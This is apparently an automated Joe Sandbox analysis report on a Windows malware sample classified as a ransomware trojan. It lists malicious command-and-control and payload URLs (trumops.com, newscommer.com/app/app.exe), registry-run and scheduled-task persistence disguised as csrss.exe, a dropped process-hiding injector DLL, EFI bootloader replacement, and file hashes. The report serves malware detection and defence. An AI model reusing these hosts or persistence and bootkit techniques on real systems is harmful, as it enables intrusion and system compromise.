                        https://server1.trumops.comc=1a0ceff6e935c933&uuid=server1.trumops.com:443server1.trumops.com:443tcpcsrss.exe, 0000000A.00000003.825189031.0000000011998000.00000004.00000001.sdmptrue
                        • Avira URL Cloud: safe
                        		low
                        https://server1.trumops.comcsrss.exe, 0000000A.00000002.931399216.000000001195E000.00000004.00000001.sdmp, csrss.exe, 0000000A.00000002.930020449.000000001180A000.00000004.00000001.sdmptrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://devlog.gregarius.net/docs/ua)LinksjkDmft1Qoe.exe, 00000000.00000000.657144938.000000000069F000.00000002.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.664709425.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000000A.00000002.926327275.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000011.00000000.682598092.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000016.00000002.699368177.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000019.00000002.705986499.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000001C.00000000.701533346.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://www.disneyplus.com/legal/privacy-policysvchost.exe, 00000028.00000003.787075201.000001BD3A19A000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://newscommer.com/app/app.execsrss.exe, 00000020.00000000.714633232.000000000098A000.00000008.00020000.sdmptrue
                        • URL Reputation: malware
                        		unknown
                        https://blockchain.infoindexcsrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://disneyplus.com/legal.svchost.exe, 00000028.00000003.787075201.000001BD3A19A000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://turnitin.com/robot/crawlerinfo.html)gentracebackjkDmft1Qoe.exe, 00000000.00000000.657144938.000000000069F000.00000002.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.664709425.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000000A.00000002.926327275.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000011.00000000.682598092.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000016.00000002.699368177.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000019.00000002.705986499.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000001C.00000000.701533346.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpfalse
                          		high
                          https://trumops.comjkDmft1Qoe.exe, 00000000.00000002.669814323.00000000118B8000.00000004.00000001.sdmp, jkDmft1Qoe.exe, 00000004.00000002.681186282.00000000118BE000.00000004.00000001.sdmp, csrss.exe, 0000000A.00000002.930020449.000000001180A000.00000004.00000001.sdmp, csrss.exe, 0000000A.00000002.931198604.000000001190C000.00000004.00000001.sdmp, csrss.exe, 00000011.00000002.701725692.000000001180E000.00000004.00000001.sdmp, csrss.exe, 00000016.00000002.704417862.00000000118DC000.00000004.00000001.sdmp, csrss.exe, 00000019.00000002.708218344.00000000118D6000.00000004.00000001.sdmp, csrss.exe, 0000001C.00000002.709002807.000000001187C000.00000004.00000001.sdmp, csrss.exe, 00000020.00000002.724004382.00000000118BA000.00000004.00000001.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://sitescore.aiValuejkDmft1Qoe.exe, 00000000.00000000.657144938.000000000069F000.00000002.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.664709425.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000000A.00000002.926327275.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000011.00000000.682598092.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000016.00000002.699368177.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000019.00000002.705986499.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000001C.00000000.701533346.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://trumops.com/api/logcsrss.exe, 0000000A.00000002.930020449.000000001180A000.00000004.00000001.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.avantbrowser.com)MOT-V9mm/00.62jkDmft1Qoe.exe, 00000000.00000000.657144938.000000000069F000.00000002.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.664709425.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000000A.00000002.926327275.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000011.00000000.682598092.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000016.00000002.699368177.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000019.00000002.705986499.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000001C.00000000.701533346.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpfalse
                          • Avira URL Cloud: safe
                          		low
                          http://search.msn.com/msnbot.htm)pkcs7:jkDmft1Qoe.exe, 00000000.00000000.657144938.000000000069F000.00000002.00020000.sdmp, jkDmft1Qoe.exe, 00000004.00000000.664709425.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000000A.00000002.926327275.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000011.00000000.682598092.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000016.00000002.699368177.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000019.00000002.705986499.000000000069F000.00000002.00020000.sdmp, csrss.exe, 0000001C.00000000.701533346.000000000069F000.00000002.00020000.sdmp, csrss.exe, 00000020.00000002.720972222.000000000069F000.00000002.00020000.sdmpfalse
                            		high
                            https://trumops.com/api/logmountvol.commountvol.exemountvol.batmountvol.cmdmountvol.vbsmountvol.vbemcsrss.exe, 0000000A.00000003.825189031.0000000011998000.00000004.00000001.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://help.disneyplus.com.svchost.exe, 00000028.00000003.787075201.000001BD3A19A000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://server1.trumops.comserver1.trumops.com:443server1.trumops.com:443tcpserver1.trumops.comcsrss.exe, 0000000A.00000002.930804048.00000000118AE000.00000004.00000001.sdmptrue
                            • Avira URL Cloud: safe
                            		low

                            Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public

                            IPDomainCountryFlagASNASN NameMalicious
                            172.67.139.144
                            		server1.trumops.comUnited States
                            		13335CLOUDFLARENETUSfalse
                            104.21.79.9
                            		unknownUnited States
                            		13335CLOUDFLARENETUSfalse
                            172.67.196.11
                            		gohnot.comUnited States
                            		13335CLOUDFLARENETUStrue

                            General Information

                            Joe Sandbox Version:33.0.0 White Diamond
                            Analysis ID:504422
                            Start date:18.10.2021
                            Start time:08:00:24
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 12m 19s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:jkDmft1Qoe (renamed file extension from none to exe)
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:52
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.rans.troj.evad.winEXE@48/13@12/3
                            EGA Information:Failed
                            HDC Information:
                            • Successful, ratio: 98.7% (good quality ratio 81.5%)
                            • Quality average: 59.4%
                            • Quality standard deviation: 36.3%
                            HCA Information:Failed
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            Warnings:
                            Show All
                            • Exclude process from analysis (whitelisted): taskhostw.exe, dllhost.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, wuapihost.exe
                            • Excluded IPs from analysis (whitelisted): 20.82.210.154, 95.100.218.79, 104.94.89.6, 40.127.240.158, 20.54.110.249, 40.112.88.60, 40.91.112.76, 2.20.178.33, 2.20.178.24, 20.50.102.62
                            • Excluded domains from analysis (whitelisted): displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, e12564.dspb.akamaiedge.net, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, settings-win.data.microsoft.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            08:01:17API Interceptor10x Sleep call for process: jkDmft1Qoe.exe modified
                            08:01:25AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SilentDust "C:\Windows\rss\csrss.exe"
                            08:01:26API Interceptor17x Sleep call for process: csrss.exe modified
                            08:01:28Task SchedulerRun new task: csrss path: C:\Windows\rss\csrss.exe
                            08:01:35AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SilentDust "C:\Windows\rss\csrss.exe"
                            08:02:16API Interceptor10x Sleep call for process: svchost.exe modified

                            Joe Sandbox View / Context

                            IPs

                            No context

                            Domains

                            No context

                            ASN

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            CLOUDFLARENETUSgaGitt11ES.exeGet hashmaliciousBrowse
                            • 104.21.26.237
                            gaGitt11ES.exeGet hashmaliciousBrowse
                            • 104.21.26.237
                            DHL Confirmation CBJ211011128996.exeGet hashmaliciousBrowse
                            • 162.159.134.233
                            88xYHws13N.exeGet hashmaliciousBrowse
                            • 172.67.188.154
                            roQmMJ3o13Get hashmaliciousBrowse
                            • 172.67.188.158
                            rJmZe3Ht7mGet hashmaliciousBrowse
                            • 104.21.96.121
                            qKjYSnEQoZ.exeGet hashmaliciousBrowse
                            • 172.67.142.91
                            hoho.armGet hashmaliciousBrowse
                            • 104.27.20.72
                            artifactx64.dllGet hashmaliciousBrowse
                            • 172.67.70.134
                            artifactx64.dllGet hashmaliciousBrowse
                            • 104.26.6.139
                            Invoice 3284 sales invoice.exeGet hashmaliciousBrowse
                            • 104.21.5.151
                            tvnserver.dllGet hashmaliciousBrowse
                            • 104.20.185.68
                            whaxbkJxneGet hashmaliciousBrowse
                            • 104.28.230.252
                            iVOdgBmo8O.exeGet hashmaliciousBrowse
                            • 162.159.129.233
                            artifactx64.dllGet hashmaliciousBrowse
                            • 172.67.70.134
                            artifactx64.dllGet hashmaliciousBrowse
                            • 104.20.184.68
                            4051EB7216E002CC6D827D781527D7556F4EB0F47BF09.exeGet hashmaliciousBrowse
                            • 172.67.221.103
                            XcxeEOhb0g.exeGet hashmaliciousBrowse
                            • 162.159.134.233
                            CU3wnfSlqE.exeGet hashmaliciousBrowse
                            • 172.67.168.153
                            sh1i15951IGet hashmaliciousBrowse
                            • 104.23.145.217
                            CLOUDFLARENETUSgaGitt11ES.exeGet hashmaliciousBrowse
                            • 104.21.26.237
                            gaGitt11ES.exeGet hashmaliciousBrowse
                            • 104.21.26.237
                            DHL Confirmation CBJ211011128996.exeGet hashmaliciousBrowse
                            • 162.159.134.233
                            88xYHws13N.exeGet hashmaliciousBrowse
                            • 172.67.188.154
                            roQmMJ3o13Get hashmaliciousBrowse
                            • 172.67.188.158
                            rJmZe3Ht7mGet hashmaliciousBrowse
                            • 104.21.96.121
                            qKjYSnEQoZ.exeGet hashmaliciousBrowse
                            • 172.67.142.91
                            hoho.armGet hashmaliciousBrowse
                            • 104.27.20.72
                            artifactx64.dllGet hashmaliciousBrowse
                            • 172.67.70.134
                            artifactx64.dllGet hashmaliciousBrowse
                            • 104.26.6.139
                            Invoice 3284 sales invoice.exeGet hashmaliciousBrowse
                            • 104.21.5.151
                            tvnserver.dllGet hashmaliciousBrowse
                            • 104.20.185.68
                            whaxbkJxneGet hashmaliciousBrowse
                            • 104.28.230.252
                            iVOdgBmo8O.exeGet hashmaliciousBrowse
                            • 162.159.129.233
                            artifactx64.dllGet hashmaliciousBrowse
                            • 172.67.70.134
                            artifactx64.dllGet hashmaliciousBrowse
                            • 104.20.184.68
                            4051EB7216E002CC6D827D781527D7556F4EB0F47BF09.exeGet hashmaliciousBrowse
                            • 172.67.221.103
                            XcxeEOhb0g.exeGet hashmaliciousBrowse
                            • 162.159.134.233
                            CU3wnfSlqE.exeGet hashmaliciousBrowse
                            • 172.67.168.153
                            sh1i15951IGet hashmaliciousBrowse
                            • 104.23.145.217

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            B:\EFI\Boot\old.efi (copy)app.exeGet hashmaliciousBrowse
                              csrss.exeGet hashmaliciousBrowse
                                csrss.exeGet hashmaliciousBrowse
                                  gFNUQfsbhl.exeGet hashmaliciousBrowse
                                    AHRwK0YGzi.exeGet hashmaliciousBrowse
                                      xYVQ2CgP0M.exeGet hashmaliciousBrowse
                                        HAZhIgUBm9.exeGet hashmaliciousBrowse
                                          hwvUt9M5T0.exeGet hashmaliciousBrowse
                                            7u479GG98a.exeGet hashmaliciousBrowse
                                              bjEAtgsQV8.exeGet hashmaliciousBrowse
                                                bxW8vusMVJ.exeGet hashmaliciousBrowse
                                                  5uy2bFmu5S.exeGet hashmaliciousBrowse
                                                    ddscRyPcLJ.exeGet hashmaliciousBrowse
                                                      v1Ni5GOWI6.exeGet hashmaliciousBrowse
                                                        A9j7TdY8pG.exeGet hashmaliciousBrowse
                                                          10hORi8M8E.exeGet hashmaliciousBrowse
                                                            5H9JkoJNvF.exeGet hashmaliciousBrowse
                                                              mLvt2Sebz3.exeGet hashmaliciousBrowse
                                                                3GF9iwTaki.exeGet hashmaliciousBrowse
                                                                  Meta.exeGet hashmaliciousBrowse

                                                                    Created / dropped Files

                                                                    B:\EFI\Boot\old.efi (copy)
                                                                    Process:C:\Windows\rss\csrss.exe
                                                                    File Type:MS-DOS executable
                                                                    Category:dropped
                                                                    Size (bytes):7680
                                                                    Entropy (8bit):4.486535052248291
                                                                    Encrypted:false
                                                                    SSDEEP:48:glTSYARWU4VIDJY5fxSgwG89gAgseSNhcl7HoE4h2KP+59L+1o7InTJ/R9W3afJX:stOWU+rpT8ZeSNul7IEkdAL+pt/63
                                                                    MD5:17ACB515B5FA45DEF030B191E5BC7991
                                                                    SHA1:539E0729C6FE8460F20A0DF044DCE5D3AB629E7C
                                                                    SHA-256:9FDB7C1359F3F2F7279F1DF4BDE648C080231ED21A22906E908EF3F91F0D00EE
                                                                    SHA-512:5057F569321E7F3E40CF427D87FBFD4331E33914A61FAB059AE870BC6C17640E63CDFB7AE323846F161B124875BA874BED3A674D434CA3E5BC8116F6600062EA
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Joe Sandbox View:
                                                                    • Filename: app.exe, Detection: malicious, Browse
                                                                    • Filename: csrss.exe, Detection: malicious, Browse
                                                                    • Filename: csrss.exe, Detection: malicious, Browse
                                                                    • Filename: gFNUQfsbhl.exe, Detection: malicious, Browse
                                                                    • Filename: AHRwK0YGzi.exe, Detection: malicious, Browse
                                                                    • Filename: xYVQ2CgP0M.exe, Detection: malicious, Browse
                                                                    • Filename: HAZhIgUBm9.exe, Detection: malicious, Browse
                                                                    • Filename: hwvUt9M5T0.exe, Detection: malicious, Browse
                                                                    • Filename: 7u479GG98a.exe, Detection: malicious, Browse
                                                                    • Filename: bjEAtgsQV8.exe, Detection: malicious, Browse
                                                                    • Filename: bxW8vusMVJ.exe, Detection: malicious, Browse
                                                                    • Filename: 5uy2bFmu5S.exe, Detection: malicious, Browse
                                                                    • Filename: ddscRyPcLJ.exe, Detection: malicious, Browse
                                                                    • Filename: v1Ni5GOWI6.exe, Detection: malicious, Browse
                                                                    • Filename: A9j7TdY8pG.exe, Detection: malicious, Browse
                                                                    • Filename: 10hORi8M8E.exe, Detection: malicious, Browse
                                                                    • Filename: 5H9JkoJNvF.exe, Detection: malicious, Browse
                                                                    • Filename: mLvt2Sebz3.exe, Detection: malicious, Browse
                                                                    • Filename: 3GF9iwTaki.exe, Detection: malicious, Browse
                                                                    • Filename: Meta.exe, Detection: malicious, Browse
                                                                    Preview: MZ......................................................................................................................................................................................................PE..d................." .........................................................`.......!.......................................................................0...............P......<#...............................................................................text............................... ..h.data........ ......................@....pdata.......0......................@..H.xdata.......@......................@..B.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                    B:\EFI\Microsoft\Boot\fw.efi (copy)
                                                                    Process:C:\Windows\rss\csrss.exe
                                                                    File Type:MS-DOS executable
                                                                    Category:dropped
                                                                    Size (bytes):7680
                                                                    Entropy (8bit):4.486535052248291
                                                                    Encrypted:false
                                                                    SSDEEP:48:glTSYARWU4VIDJY5fxSgwG89gAgseSNhcl7HoE4h2KP+59L+1o7InTJ/R9W3afJX:stOWU+rpT8ZeSNul7IEkdAL+pt/63
                                                                    MD5:17ACB515B5FA45DEF030B191E5BC7991
                                                                    SHA1:539E0729C6FE8460F20A0DF044DCE5D3AB629E7C
                                                                    SHA-256:9FDB7C1359F3F2F7279F1DF4BDE648C080231ED21A22906E908EF3F91F0D00EE
                                                                    SHA-512:5057F569321E7F3E40CF427D87FBFD4331E33914A61FAB059AE870BC6C17640E63CDFB7AE323846F161B124875BA874BED3A674D434CA3E5BC8116F6600062EA
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview: MZ......................................................................................................................................................................................................PE..d................." .........................................................`.......!.......................................................................0...............P......<#...............................................................................text............................... ..h.data........ ......................@....pdata.......0......................@..H.xdata.......@......................@..B.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                    C:\EFI\Boot\EfiGuardDxe.efi
                                                                    Process:C:\Windows\rss\csrss.exe
                                                                    File Type:MS-DOS executable
                                                                    Category:dropped
                                                                    Size (bytes):279552
                                                                    Entropy (8bit):4.553173975914215
                                                                    Encrypted:false
                                                                    SSDEEP:3072:ekODsOuozgl9aXsRzZZZZrUhFapDL4k2yntc:ekeklesRD6yt
                                                                    MD5:2B84CB96AE6280C2020FA46E4A8A07D8
                                                                    SHA1:E920E40CFC0C6A805D657C8F23F9C0612CD39F59
                                                                    SHA-256:01E86A4DFE6E0DE7857B3CF2FAFD041C8B3A3241E00844CB6BFBD3BFAE2D36BC
                                                                    SHA-512:F1A6598116F78FBA1F9531301A7313AC204BAB3B7AEBC299F69F2ED406F4EDAFC3410DB860E93D0DC7C24398F5A7FF595764400F31A3A06679FD6EC0EFB116D9
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview: MZ..............................................................................................................................................................................................PE..d................." ................x........................................................................................................................P...............p.......................................................................................text.............................. ..h.data..............................@....pdata.......P.......8..............@..H.xdata..X....`.......<..............@..B.reloc.......p.......B..............@..B........................................................................................................................................................................................................................................................................................................................................................
                                                                    C:\EFI\Boot\bootx64.efi
                                                                    Process:C:\Windows\rss\csrss.exe
                                                                    File Type:MS-DOS executable
                                                                    Category:dropped
                                                                    Size (bytes):7680
                                                                    Entropy (8bit):4.486535052248291
                                                                    Encrypted:false
                                                                    SSDEEP:48:glTSYARWU4VIDJY5fxSgwG89gAgseSNhcl7HoE4h2KP+59L+1o7InTJ/R9W3afJX:stOWU+rpT8ZeSNul7IEkdAL+pt/63
                                                                    MD5:17ACB515B5FA45DEF030B191E5BC7991
                                                                    SHA1:539E0729C6FE8460F20A0DF044DCE5D3AB629E7C
                                                                    SHA-256:9FDB7C1359F3F2F7279F1DF4BDE648C080231ED21A22906E908EF3F91F0D00EE
                                                                    SHA-512:5057F569321E7F3E40CF427D87FBFD4331E33914A61FAB059AE870BC6C17640E63CDFB7AE323846F161B124875BA874BED3A674D434CA3E5BC8116F6600062EA
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview: MZ......................................................................................................................................................................................................PE..d................." .........................................................`.......!.......................................................................0...............P......<#...............................................................................text............................... ..h.data........ ......................@....pdata.......0......................@..H.xdata.......@......................@..B.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                    C:\EFI\Microsoft\Boot\bootmgfw.efi
                                                                    Process:C:\Windows\rss\csrss.exe
                                                                    File Type:MS-DOS executable
                                                                    Category:dropped
                                                                    Size (bytes):7680
                                                                    Entropy (8bit):4.486535052248291
                                                                    Encrypted:false
                                                                    SSDEEP:48:glTSYARWU4VIDJY5fxSgwG89gAgseSNhcl7HoE4h2KP+59L+1o7InTJ/R9W3afJX:stOWU+rpT8ZeSNul7IEkdAL+pt/63
                                                                    MD5:17ACB515B5FA45DEF030B191E5BC7991
                                                                    SHA1:539E0729C6FE8460F20A0DF044DCE5D3AB629E7C
                                                                    SHA-256:9FDB7C1359F3F2F7279F1DF4BDE648C080231ED21A22906E908EF3F91F0D00EE
                                                                    SHA-512:5057F569321E7F3E40CF427D87FBFD4331E33914A61FAB059AE870BC6C17640E63CDFB7AE323846F161B124875BA874BED3A674D434CA3E5BC8116F6600062EA
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview: MZ......................................................................................................................................................................................................PE..d................." .........................................................`.......!.......................................................................0...............P......<#...............................................................................text............................... ..h.data........ ......................@....pdata.......0......................@..H.xdata.......@......................@..B.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                    C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                                                                    Process:C:\Windows\rss\csrss.exe
                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):101376
                                                                    Entropy (8bit):5.951577458824018
                                                                    Encrypted:false
                                                                    SSDEEP:3072:U3JJpaHtGsxJZ7zmaUMf2ETb4w1GMYbuT:csTF5U3EfndT
                                                                    MD5:09031A062610D77D685C9934318B4170
                                                                    SHA1:880F744184E7774F3D14C1BB857E21CC7FE89A6D
                                                                    SHA-256:778BD69AF403DF3C4E074C31B3850D71BF0E64524BEA4272A802CA9520B379DD
                                                                    SHA-512:9A276E1F0F55D35F2BF38EB093464F7065BDD30A660E6D1C62EED5E76D1FB2201567B89D9AE65D2D89DC99B142159E36FB73BE8D5E08252A975D50544A7CDA27
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Metadefender, Detection: 46%, Browse
                                                                    • Antivirus: ReversingLabs, Detection: 59%
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b..............k......k......k..r...w......w......w......k............. w...... w...... w......Rich............PE..d...o.D`.........." ................$/....................................................`..................................................g..(...............p...............<....W..8...........................@W..8............................................text............................... ..`.rdata.............................@..@.data................d..............@....pdata..p............p..............@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..<...........................@..B................................................................................................................................................................................................................
                                                                    C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe
                                                                    Process:C:\Windows\rss\csrss.exe
                                                                    File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):288256
                                                                    Entropy (8bit):6.31266455792162
                                                                    Encrypted:false
                                                                    SSDEEP:3072:qbHszDaOJ8u2HHFIWr6e29kOnK7qFQ8wMii5I7kGvNjzMuszHshoY46bEydJ+dK9:SA3IlIA6e29vngqS8wMmuooh8z+8F
                                                                    MD5:D98E33B66343E7C96158444127A117F6
                                                                    SHA1:BB716C5509A2BF345C6C1152F6E3E1452D39D50D
                                                                    SHA-256:5DE4E2B07A26102FE527606CE5DA1D5A4B938967C9D380A3C5FE86E2E34AAAF1
                                                                    SHA-512:705275E4A1BA8205EB799A8CF1737BC8BA686925E52C9198A6060A7ABEEE65552A85B814AC494A4B975D496A63BE285F19A6265550585F2FC85824C42D7EFAB5
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Metadefender, Detection: 14%, Browse
                                                                    • Antivirus: ReversingLabs, Detection: 73%
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................|..............................................t...........Rich...................PE..d...l.D`..........".................T..........@..........................................`.....................................................(............`...'..............`...@...8...............................8............................................text...H........................... ..`.rdata...9.......:..................@..@.data...`....0......................@....pdata...'...`...(..................@..@_RDATA...............V..............@..@.rsrc................X..............@..@.reloc..`............Z..............@..B........................................................................................................................................................................................................
                                                                    C:\Windows\Logs\CBS\CBS.log
                                                                    Process:C:\Windows\servicing\TrustedInstaller.exe
                                                                    File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                    Category:modified
                                                                    Size (bytes):3014656
                                                                    Entropy (8bit):5.317147680147588
                                                                    Encrypted:false
                                                                    SSDEEP:6144:TLS5YygL1mnGVFQa/qJIxOfTFyKQel5lmhSVjfChq4TMmdqLO:TL1dqLO
                                                                    MD5:49E7A7625D816E9960A34E806C14B6C4
                                                                    SHA1:E71D5D8B9EAA9C40587BD73034C508C0CC3F51CF
                                                                    SHA-256:B249DE239817B1F6E3151102AB803CE412890A0DEB3E644AB567573F9317D3AA
                                                                    SHA-512:F63E88FA79FE2730156F0C9F55C0D9B0F226F419E82749786856BE93937DC12378835F9D611C7E8F1834B02DAD88EF07BC59965039E129E3C17F93DD01965D67
                                                                    Malicious:false
                                                                    Preview: .2019-06-27 00:55:29, Info CBS TI: --- Initializing Trusted Installer ---..2019-06-27 00:55:29, Info CBS TI: Last boot time: 2019-06-27 00:49:51.660..2019-06-27 00:55:29, Info CBS Starting TrustedInstaller initialization...2019-06-27 00:55:29, Info CBS Lock: New lock added: CCbsPublicSessionClassFactory, level: 30, total lock:4..2019-06-27 00:55:29, Info CBS Lock: New lock added: CCbsPublicSessionClassFactory, level: 30, total lock:5..2019-06-27 00:55:29, Info CBS Lock: New lock added: WinlogonNotifyLock, level: 8, total lock:6..2019-06-27 00:55:29, Info CBS Ending TrustedInstaller initialization...2019-06-27 00:55:29, Info CBS Starting the TrustedInstaller main loop...2019-06-27 00:55:29, Info CBS TrustedInstaller service starts successfully...2019-06-27 00:55:29, Info CBS No startup pr
                                                                    C:\Windows\rss\csrss.exe
                                                                    Process:C:\Users\user\Desktop\jkDmft1Qoe.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):9054208
                                                                    Entropy (8bit):6.3340959539901585
                                                                    Encrypted:false
                                                                    SSDEEP:98304:XYgmMiJdljVuezWku32WnMpP6KE1dj/DxMLgMhZytTVhg5iqR:XYgjiJR4MpP6KCxMLphwVhG
                                                                    MD5:099AD37CECCDFA74229D976B10973736
                                                                    SHA1:1B6D65319DCB21FA94310C04BC3ABD89B90B4699
                                                                    SHA-256:DF84D3E83B4105F9178E518CA69E1A2EC3116D3223003857D892B8A6F64B05BA
                                                                    SHA-512:5E40B33665E769EEA3C506EB77F7790E11EAAF296402F7D78CD1644D434C88A593089C5349A6F894A9E6D24C96531B870D3F9BF72A021465A6D3FB52BA1FB9C2
                                                                    Malicious:true
                                                                    Yara Hits:
                                                                    • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: C:\Windows\rss\csrss.exe, Author: Joe Security
                                                                    Antivirus:
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: Metadefender, Detection: 34%, Browse
                                                                    • Antivirus: ReversingLabs, Detection: 47%
                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........&................)...1...............X...@............................................................................0................................................................................... .X..............................text...E.).......).................`..`.rdata........).......).............@..@.data.... 3...X...1...X.............@....idata..0..........."..............@....symtab..............&.................B........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    C:\Windows\windefender.exe
                                                                    Process:C:\Windows\rss\csrss.exe
                                                                    File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed
                                                                    Category:modified
                                                                    Size (bytes):2102272
                                                                    Entropy (8bit):7.879347868736008
                                                                    Encrypted:false
                                                                    SSDEEP:49152:1+yuly+dcYwIx9qadRmAYBfo9hazz2Du5VDyn:1Cy+qa9qWmAYBQfazzpDy
                                                                    MD5:E0A50C60A85BFBB9ECF45BFF0239AAA3
